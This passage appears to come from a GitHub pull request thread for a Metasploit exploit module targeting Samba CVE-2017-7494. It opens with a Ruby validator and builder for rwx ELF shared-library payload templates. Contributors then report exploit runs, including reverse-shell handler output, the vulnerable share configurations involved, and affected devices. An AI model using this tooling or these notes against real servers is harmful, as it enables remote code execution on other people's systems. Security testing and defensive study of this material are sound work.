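    { ehdr: h * 2 + w * 5 + h * 6, ehdr_len: 52, phdr: w * 8, phdr_len: 32,
      phdr_fields: %i[p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags p_align] }
  else
    { ehdr: h * 2 + w + q * 3 + w + h * 6, ehdr_len: 64, phdr: w * 2 + q * 6, phdr_len: 56,
      phdr_fields: %i[p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align] }
  end
end

# Returns { class:, endian:, machine:, phdrs:, problems: }; an empty :problems
# array means the skeleton is at least structurally mappable by dlopen().
def check_template(bytes)
  bytes = bytes.b
  problems = []
  return { problems: ['not an ELF file'] } unless bytes[0, 4] == ELF_MAGIC
  cls = bytes.getbyte(4)
  big = bytes.getbyte(5) == 2
  return { problems: ["bad EI_CLASS #{cls}"] } unless [1, 2].include?(cls)
  l = elf_layout(cls, big)
  e_type, e_machine, _ver, _entry, e_phoff, _shoff, _flags, e_ehsize, e_phentsize, e_phnum =
    bytes[16, l[:ehdr_len] - 16].unpack(l[:ehdr])
  problems << "e_type #{e_type} is not ET_DYN (3); dlopen() will refuse it" unless e_type == ET_DYN
  problems << "e_ehsize #{e_ehsize} != #{l[:ehdr_len]}" unless e_ehsize == l[:ehdr_len]
  problems << "e_phentsize #{e_phentsize} != #{l[:phdr_len]}" unless e_phentsize == l[:phdr_len]
  phdrs = []
  e_phnum.times do |i|
    raw = bytes[e_phoff + i * l[:phdr_len], l[:phdr_len]]
    if raw.nil? || raw.bytesize < l[:phdr_len]
      problems << "program header #{i} lies outside the file"
      break
    end
    phdrs << l[:phdr_fields].zip(raw.unpack(l[:phdr])).to_h
  end
  phdrs.each_with_index do |ph, i|
    if (ph[:p_flags] & ~(PF_R | PF_W | PF_X)) != 0
      # a size or offset where a PF_* mask belongs: fields are in the other class's order
      other = cls == 1 ? 'Elf64' : 'Elf32'
      problems << "phdr #{i}: p_flags=0x#{ph[:p_flags].to_s(16)} has non-PF bits; fields look like #{other} order"
    end
    problems << "phdr #{i}: p_offset+p_filesz runs past end of file" if ph[:p_offset] + ph[:p_filesz] > bytes.bytesize
    problems << "phdr #{i}: p_memsz < p_filesz" if ph[:p_memsz] < ph[:p_filesz]
    a = ph[:p_align]
    problems << "phdr #{i}: p_align #{a} is not a power of two" if a > 1 && (a & (a - 1)) != 0
  end
  problems << 'no PT_LOAD segment' unless phdrs.any? { |ph| ph[:p_type] == PT_LOAD }
  problems << 'no PT_DYNAMIC segment' unless phdrs.any? { |ph| ph[:p_type] == PT_DYNAMIC }
  { class: cls == 1 ? 'ELF32' : 'ELF64', endian: big ? 'big' : 'little',
    machine: MACHINES.fetch(e_machine, "EM_#{e_machine}"), phdrs: phdrs, problems: problems }
end

# Constructed skeleton (assumed values, not the PR's templates): one rwx
# PT_LOAD covering the file plus a PT_DYNAMIC. With misorder32: true the
# 32-bit program headers are emitted in Elf64 field order, reproducing the
# p_flags placement flagged in review.
def build_skeleton(cls:, big:, machine:, misorder32: false)
  l = elf_layout(cls, big)
  total = l[:ehdr_len] + 2 * l[:phdr_len]
  segs = [
    { p_type: PT_LOAD, p_offset: 0, p_vaddr: 0, p_paddr: 0, p_filesz: total, p_memsz: total,
      p_flags: PF_R | PF_W | PF_X, p_align: 0x1000 },
    { p_type: PT_DYNAMIC, p_offset: 0, p_vaddr: 0, p_paddr: 0, p_filesz: total, p_memsz: total,
      p_flags: PF_R | PF_W, p_align: 8 }
  ]
  order = misorder32 && cls == 1 ? elf_layout(2, big)[:phdr_fields] : l[:phdr_fields]
  ident = ELF_MAGIC + [cls, big ? 2 : 1, 1, 0].pack('C4') + ("\x00" * 8).b
  ehdr = [ET_DYN, machine, 1, 0, l[:ehdr_len], 0, 0, l[:ehdr_len], l[:phdr_len], segs.size, 0, 0, 0].pack(l[:ehdr])
  ident + ehdr + segs.map { |s| order.map { |k| s.fetch(k) }.pack(l[:phdr]) }.join
end

GOOD_X86_64 = build_skeleton(cls: 2, big: false, machine: 62)
GOOD_ARMLE  = build_skeleton(cls: 1, big: false, machine: 40)
GOOD_MIPSBE = build_skeleton(cls: 1, big: true, machine: 8)
BAD_ARMLE   = build_skeleton(cls: 1, big: false, machine: 40, misorder32: true)

if __FILE__ == $PROGRAM_NAME
  { 'x86_64' => GOOD_X86_64, 'armle' => GOOD_ARMLE, 'mipsbe' => GOOD_MIPSBE,
    'armle-misordered' => BAD_ARMLE }.each do |name, blob|
    r = check_template(blob)
    puts "#{name}: #{r[:class]} #{r[:endian]}-endian #{r[:machine]} problems=#{r[:problems].inspect}"
  end
end
```

Run it against a real template with `check_template(File.binread('template.so'))`. A 32-bit skeleton assembled by copying the 64-bit field order shows up as p_flags carrying a size value rather than a PF_* mask, which is the symptom behind the review comment on the PT_DYNAMIC hunk. A clean report only says the loader can map the file; it says nothing about the payload stub the template is meant to carry.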

@timwr

timwr May 25, 2017

Contributor

@mzpqnxow we could very much use your cross compiler skills here: https://github.com/rapid7/mettle (it's the Linux meterpreter).

@mzpqnxow

mzpqnxow May 25, 2017

My time is tight right now, but I will see what I can do.. Rapid-7 is net-30 right?

:P

@aconite33

aconite33 May 25, 2017

Edit***
If you do a fresh install, do not allow network connections, and install the Samba package via install (CD), this exploit will work. The network install (apt-get install samba) seems to have been updated (4.3.11).

Following @fupinglee's blog and talking to @hdm, I was unable to reproduce the exploit on Ubuntu 16.04.02. Per @hdm I ran "strace -f -qix -o smbd.log smbd -F -S". I've attached the log here.

root@ubuntu:/tmp# uname -a
Linux ubuntu 4.8.0-36-generic #36~16.04.1-Ubuntu SMP Sun Feb 5 09:39:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:/tmp# smbd -V
Version 4.3.11-Ubuntu

My config for Samba is as follows:

[asdf]
	path=/tmp
	public=yes
	writeable=yes

I cloned HDM's branch when I ran this from Metasploit. I also followed @fupinglee on a Kali distro msf and the results were the same.
smbd.log.tar.gz

@hdm

hdm May 25, 2017

Contributor

@Mzack9999 thanks for the offer but it looks like we will have this sorted out soon.

@hashtaginfosec

hashtaginfosec May 25, 2017

Ran it against Synology Disk Station DS212j and got no-access and STATUS_ACCOUNT_DISABLED. I think this is because default admin account is disabled.

[*] Started reverse TCP handler on 192.168.1.100:4444
[-] 192.168.1.101:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
[*] Exploit completed, but no session was created.

@Viss

Viss May 25, 2017

synology nas DS1815+ vulnerable as well!

@0x00string

0x00string May 25, 2017

I'm getting the following error when running the exploit against:

Linux HOSTNAME 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

With samba version:

Version 4.3.11-Ubuntu

[-] 172.20.32.4:445 - Exploit failed: Rex::Proto::SMB::Exceptions::NoReply The SMB server did not reply to our request

The exploit dies after getting a RST in response to Tree Disconnect after uploading the test .txt file.

My smb.conf lines for the shares are as follows:

[sambashare]
path = /sambashare
browsable = yes
public = yes
writable = yes
guest ok = yes
create mask = 0644
directory mask = 0755
force user = shareuser

[simple]
path = /simpleshare
public = yes
writeable = yes
guest ok = yes
browsable = yes

Thanks to @hdm for inadvertently fixing my msfvenom bug too!

@egypt

egypt May 25, 2017

Contributor

@hdm how close would you say this is to done? Would it be reasonable to land this in its current state and continue dev in a new PR?

@wvu-r7

wvu-r7 May 25, 2017

Contributor

I'm ready to ship this. It works quite well.

@hdm

hdm May 25, 2017

Contributor

@egypt This should be good to go for now. I added the BruteforcePID advanced option for folks who want to test, but it's disabled by default. The code now also autodeletes the payload from the share.

@hdm

hdm May 25, 2017

Contributor

Should we disable the ARM target or forcibly set 'SHELL' on the payload option?

@hdm

hdm May 25, 2017

Contributor

@qasimchadhar That happens when Guest is 'disabled'

@hdm

hdm May 25, 2017

Contributor

@reznok Double check to make sure the patch wasn't automatically installed

@h00die

h00die May 25, 2017

Contributor

The PR for the docs is ready to land before this is landed. It's good enough for the time being.

Merge pull request #15 from h00die/sambapwn
docs for is_known_pipename

wvu-r7 added a commit to wvu-r7/metasploit-framework that referenced this pull request May 25, 2017

@wvu-r7 wvu-r7 merged commit 4ec5831 into rapid7:master May 25, 2017

1 check was pending: continuous-integration/travis-ci/pr (The Travis CI build is in progress)
@OJ

OJ May 25, 2017

Contributor

Nice

@hiw0rld

hiw0rld May 26, 2017

@bcoles I don't use any stack trace. Do you mean the client or the Samba server?

@hdm hdm deleted the hdm:module/CVE-2017-7494 branch May 26, 2017

@nixawk

nixawk May 26, 2017

Contributor

Bug Flow

-> /path/to/samba-X.X.XX

bug-flow

@hdm

hdm May 28, 2017

Contributor

Maybe time to lock this PR for future comments?

@wvu-r7

wvu-r7 May 28, 2017

Contributor

Agreed. This is not a support forum, folks. Take it to IRC or the Rapid7 Community site. File a ticket if it's a bug.

@rapid7 rapid7 locked and limited conversation to collaborators May 28, 2017

@h00die h00die added the docs label May 29, 2017

@alrosenthal-r7

alrosenthal-r7 May 31, 2017

Release Notes

The exploits/linux/samba/is_known_pipename module has been added to the framework. This module exploits Samba from versions 3.5.0-4.4.14, 4.5.10, and 4.6.4 by loading a malicious shared library. The exploit requires valid credentials, a writeable folder in an accessible share, and the server-side path of the writeable folder. However, in some cases anonymous access with common filesystem locations can be used to automate exploitation.

@hdm

hdm Jun 1, 2017

Contributor

^ no longer true with the current PR.

@h00die

h00die Jun 1, 2017

Contributor

May need to update the docs and info section (or just the docs). I have a note to review and update the MD tomorrow.
